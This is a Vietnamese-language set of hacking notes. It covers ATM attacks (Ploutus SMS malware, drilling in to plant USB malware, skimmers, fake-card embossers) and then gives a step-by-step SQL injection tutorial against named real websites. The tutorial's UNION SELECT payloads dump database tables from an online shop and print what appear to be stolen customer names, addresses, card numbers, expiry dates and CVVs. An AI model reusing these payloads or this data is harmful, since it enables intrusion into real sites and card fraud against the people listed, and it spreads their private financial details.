Hacker

Cấu Tạo ATM

1. Phần Cứng: Máy vi tính, thiết bị điếm tiền, thiết bị trả tiền, Thiết bị in nhật ký, thiết bị in biên lai, phím nhập mật mã, thiết bị đọc thẻ, hộp đựng tiền, két sắt chứa hộp đựng tiền…
2. Phần mềm: Hệ điều hành window xp hoặc window NT; phần mềm điều khiển thiết bị của máy, phần mềm tiện ích kèm theo
3. Bàn phím: bàn phím của máy ATM cũng chính là một thiết bị mã hóa theo thuật toán Des hay tripleDes bằng thiết bị phần cứng.
4. Máy PC điều khiển: Là máy tính pc chuyên dụng, được dùng cho máy ATM; chạy hệ điều hành window xp, trên mỗi PC điều cài đặt phần mềm kiểm soát các hoạt động của máy ATM
5. Mạng lưới ATM: là hệ thống mạng gồm các thành phần trung tâm như: Switch, corebank và các hệ thống mạng viễn thông dùng để kết nối các thiết bị thanh toán.
6. Giao thức kết nối Máy ATM: ở Việt Nam máy ATM sử dụng giao thức TCP/ip để kết nối, các giao thức này được hổ trợ bởi các đường truyền thông như đường lease line, mega wan, dial up.

Nguyên Lý Hoạt Động

Hack ATM

1. Hack ATM bằng tin nhắn

·                     Kết nối điện thoại di động với máy tính bằng cáp USB và cài đặt phần mềm độc hại Ploutus (tên chính xác của phần mềm độc hại: Backdoor.ploutus)

·                     Kẻ tấn công gửi hai tin nhắn SMS đến điện thoại di động bên trong máy ATM.

o                    SMS 1 bao gồm một ID hợp lệ kích hoạt để kích hoạt các phần mềm độc hại

o                    SMS 2 chứa một lệnh phân phát hợp lệ để có được tiền ra khỏi

·                     Điện thoại di động gắn bên trong máy ATM phát hiện các tin nhắn SMS có giá trị và chuyển tiếp chúng đến máy ATM như một gói tin TCP hoặc UDP.

·                     Màn hình gói dữ liệu mạng (NPM) mô-đun mã hóa trong các phần mềm độc hại nhận được gói tin TCP / UDP và nếu nó có chứa một lệnh hợp lệ, nó sẽ thực hiện Ploutus

·                     Số tiền rút tiền trước khi cấu hình bên trong phần mềm độc hại

·                     Cuối cùng, các hacker có thể thu tiền mặt từ máy ATM bị tấn công.

2. Hack ATM bằng thẻ

Chuẩn bị:

Sáp đèn cầy bôi lên bảng điều khiển của thẻ ATM

Thực hành:

Đưa thẻ vào máy, nhập mã pin mật định 0000

3. Hack ATM bằng Phần mềm chứa virut xâm nhập vào máy ATM

-          Khoan lủng chổ chứa ổ cấm USB

-          Cấm USB chứa phần mềm virus vào ổ cấm

-          Hàn chổ khoan lại để tránh bị phát hiện

4. Hack ATM bằng lắp đặt hệ thống
Chuẩn bị:

-          ATM skimmer

-          MSR 206 
-       Bluetooth / Laptop

5. Máy làm thẻ giả ATM được gọi là ABS ATM cardholder
Nơi rao bán trên mạng:

Product Description: credit smart bank ATM PEC ABS RFID plastic PVC card embosser WENLIN-2000-1  credit smart bank ATM PEC ABS RFID plastic PVC card embosser Its function as follow:(Emboss top and engrave from behind) 1,Emboss letters and numbers for ATM bank card 2,Top quality die 5,Total 67 fonts 6,Put color on the embossed letters/numbers by hot stamping machine, match with our hot stamper for better quality. Technology Parameters: Fonts plate shape:round Character Size: international credit card size Fonts: small letters: A to Z small numbers: 0-9 big numbers:0-9 Normal other symbols Space: 1/7 and 1/10 (only suitable for small characters) Pressing method: in manual Word count: from 1 to 11 rows, at most up to 23 rows Indication of the place of the marked character: indication needle or mold card Volume: 340 x 270 x 165mm (L x W x H) Net weight: 9kgs Gross weight: 9.5kgs

Price: US $ 200 - 500 / Unit Brand Name: Wenlin Model Number: WENLIN-2000 Country/Region: China Post Date: Mar 27,2012 Supplier Details: Wuhan Wenlin Technology Co., Ltd. Sales:Ms. Ms Tina Contact Phone:86-27-68823488 Main Products:Other Plastic Building Materials Business type:Manufacturer

6. Máy in thẻ nhựa (in hàng chữ nỗi trên ATM)
Địa chỉ rao bán: http://www.thenhuavieta.com/

Cách xem id của một trang web bất kỳ chỉ dùng window

Start- program- accessories- command prompt hiện lên cửa sổ gõ lệnh Nslookup; dán địa chỉ web cần tìm và nhấn enter

cách xem vị trí nếu biết id hoặc biết trang web

http://whois.domaintools.com

Tìm hiểu về mạng

nền tảng mạng, lập trình hệ thống, sau đó học thêm các phương thức thâm nhập căn bản.

mỗi máy tính có duy nhất một địa chỉ MAC

- Trang tìm vị trí, id: http://whois.domaintools.com

Một số trang tận cùng có id

http://ceh.vn/@4rum/showthread.php?tid=3054

http://ceh.vn/@4rum/showthread.php?tid=4076

http://www.deanaccessories.com/index.php?do=products&category_id=18

http://www.company.com/pressRelease.jsp?pressID=5

http://www.dthu.edu.vn/announcement.aspx?id=277

Tìm số trang bị lỗi SQL injector

- Vào google gõ: "inurl:index.php?id=" 

Nó sẽ hiện ra những trang web có id

-          Nếu muốn tìm một trang cụ thể vd đại học đồng tháp (www.dthu.edu.vn/index.php?id=)

   Hack bằng tay

-          Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )

-          Tìm victim, lên google search "inurl:index.php?id=" 

-          Kiểm tra lỗi bằng cách thêm dấu ‘ vào (vd: http://pscells.com/chitietsanpham.php?id=40')

-          Nếu site có lỗi thì nó hiện lên warning:…

-          Nếu site không có lỗi thì tiếp tục thử các site khác

-          Dùng lệnh order để tìm số cột (vd:
http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi ; vậy 5 < x < 10)

-          Tìm Tiếp :
http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
Vậy : 7 < x < 10
Tiếp Nào :
http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé

-          Dùng Lệnh UNION SELECT để khai thác nó
Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8
Ta Sẽ Có Link :
http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xong Vẫn Ko Thấy Gì ==> Cách Giải Quyết :
Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -

-           

Site này lỗi Injection:
  http://www.deanaccessories.com/index.php?do=products&category_id=18'

Đếm số column. Bạn để ý sự khác biệt trong 2 link sau:
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 1--
và 
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 10--
Khi mình query order by 1, không có lỗi, tức là phép query TRUE.
Khi query 10 lỗi vì số column không tới 10 nên gặp lỗi.
Bạn hãy suy nghĩ, 10 lỗi, chưa chắc là số column là 9. lần lượt order by từ 1 tới 10.
Theo kinh nghiệm, mình sử dụng order by 10, nếu lỗi thì 5, phương pháp tìm kiếm đó 
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 5--  <= TRUE
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 7--  <= TRUE
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 8--  <= TRUE
http://www.deanaccessories.com/index.php?do=products&category_id=18 order by 9--  <= FALSE
order by 8 TRUE, còn 9 lỗi suy ra có 8 column.
Tiếp tục union để lấy tables:
http://www.deanaccessories.com/index.php?do=products&category_id=18 and 1=0 union select 1,2,3,4,5,6,7,8--
Column lỗi là số 3 (nó sẽ hiện ra).
Tiếp theo sẽ lấy version của My SQL. Tại sao phải lấy??? 
Đối với Version 5, việc lấy các tables thì đơn giản, nhưng Version 4, phải đoán . Gặp Ver 4 là bỏ thôi 
http://www.deanaccessories.com/index.php?do=products&category_id=18 and 1=0 union select 1,2,version(),4,5,6,7,8--

5.1.26-rc-5.1.26rc

Ver 5 này  
Giờ là lấy tables:
http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select 1,2,group_concat(table_name),4,5,6,7,8 from  information_schema.tables--

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,dean_admin_users,dean_attributes,dean_cart,dean_categories,dean_coupons,dean_orders,dean_orders_products,dean_products,dean_products_attributes,dean_reviews,dean_shipping,dean_sub_attributes

Thường thì CC hay chứa ở các table như order custommer, users. Ở đây mình thử coi cái tabledean_orders xem.

Vào trang: http://www.string-functions.com/string-hex.aspx để converter chuỗi qua HEX để query.

Converter chuỗi: dean_orders sẽ được 6465616e5f6f7264657273

Tiếp theo lấy column: 
http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select 1,2,group_concat(column_name),4,5,6,7,8 from  information_schema.columns where table_name  in(0x6465616e5f6f7264657273)--

order_id,customer_email,customer_phone,billing_fname,billing_lname,billing_address1,billing_address2,billing_city,billing_state,billing_zip,shipping_fname,shipping_lname,shipping_address1,shipping_address2,shipping_city,shipping_state,shipping_zip,coupon_code,coupon_code_total,cc_type,cc_number,cc_exp_month,cc_exp_year,cc_code,shipping_method,shipping_instructions,shipping_total,tax_name,tax_total,order_total,payment_method,remote_ip,order_date

Bạn thấy gì chưa: cc_number,cc_exp_month,cc_exp_year,cc_code CCV nè 

Lấy data nào:
http://www.deanaccessories.com/index.php?do=products&category_id=18  and 1=0 union select  1,2,group_concat(order_id,0x7c,billing_fname,0x7c,billing_lname,0x7c,billing_address1,0x7c,billing_address2,0x7c,billing_city,0x7c,billing_state,0x7c,billing_zip,0x7c,cc_type,0x7c,cc_number,0x7c,cc_exp_month,0x7c,cc_exp_year,0x7c,cc_code),4,5,6,7,8  from dean_orders--

7c là dấu | để ngăn cách column đó.
Cái gì nó hiện ra kìa  

256|DAWN  SORA|YANG|385 E GREEN STREET UNIT  2604||PASADENA|CA|91101|Visa|4356030403082778|4|2014|876,184|Ashley|Palmer|526  Via de la Valle Unit A||Solana  Beach|CA|92075|Visa|4217661433996162|2|2013|183,183|ryan|widger|1119  earl  street||philadelphia|PA|19125|Visa|4430480001337514|10|2011|759,233|Marek|Bute|10621  San Palatina St.||Las  Vegas|NV|89141|Visa|4868302094482000|1|2012|954,234|Adam|Best|30 W  90th|Apt 3C|New  York|NY|10024|Visa|4124570009851440|11|2011|242,237|Natalia|Hryckiwskyj|3008  Granite  Rd||Woodstock|MD|21163|Visa|4828500530055020|9|2011|602,239|Shannon|DeWolfe|720  W Grace  #1N||Chicago|IL|60613|Visa|4266841228278030|5|2012|104,169|Jaime|Halla|3600  Fillmore St. #308||San  Francisco|CA|94123|MasterCard|5287161991844013|7|2011|333,170|Stacey|Bloomston|120  Camellia  Drive||Birmingham|AL|35213|Visa|4325224200204374|12|2012|410,278|Terry|Miller|3408  Ashe Road  #D||Bakersfield|CA|93309|Visa|4460248704648609|5|2013|916,232|renee|zavislak|5235  diamond heights blvd.|apt. 226|san francisco|CA|94131|Visa|446542039

Không  phải chỉ có thế thôi nha, muốn lấy tiếp, ta cho điều kiện sau truy vấn  là order_id>=232. 232 là cái order_id của CC cuối trong trang này.
Một số shop bị xóa CC Num, để lọc, ta có thể thêm where cc_num>0.